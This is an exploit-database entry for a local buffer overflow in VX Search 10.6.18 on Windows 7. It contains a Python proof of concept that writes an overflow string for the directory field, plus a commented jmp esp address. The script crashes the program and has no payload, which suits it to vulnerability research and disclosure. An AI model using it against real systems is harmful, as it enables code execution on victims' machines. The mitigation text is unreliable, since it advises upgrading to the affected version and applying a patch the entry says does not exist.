VX Search 10.6.18 Local Buffer Overflow

vendor:

VX Search

by:

Kevin McGuigan

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: VX Search

Affected Version From: 10.6.18

Affected Version To: 10.6.18

Patch Exists: NO

Related CWE: N/A

CPE: a:vxsearch:vx_search:10.6.18

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 32-bit

2018

VX Search 10.6.18 Local Buffer Overflow

A buffer overflow vulnerability exists in VX Search 10.6.18 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted input to the application, which can result in arbitrary code execution. This vulnerability affects Windows 7 32-bit.

Mitigation:

Upgrade to the latest version of VX Search 10.6.18 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Title: VX Search 10.6.18 Local Buffer Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: http://www.vxsearch.com
# Version: 10.6.18
# Date: 18/04/2018
# Tested on: Windows 7 32-bit
# Vendor did not respond to advisory. 

# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field. 

filename="vxsearchPOC.txt"
junk = "A"*271
#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll)
#eip="\x1a\x2a\x2c\x65"
eip = "B" * 4
fill = "C" *900
buffer = junk + eip + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()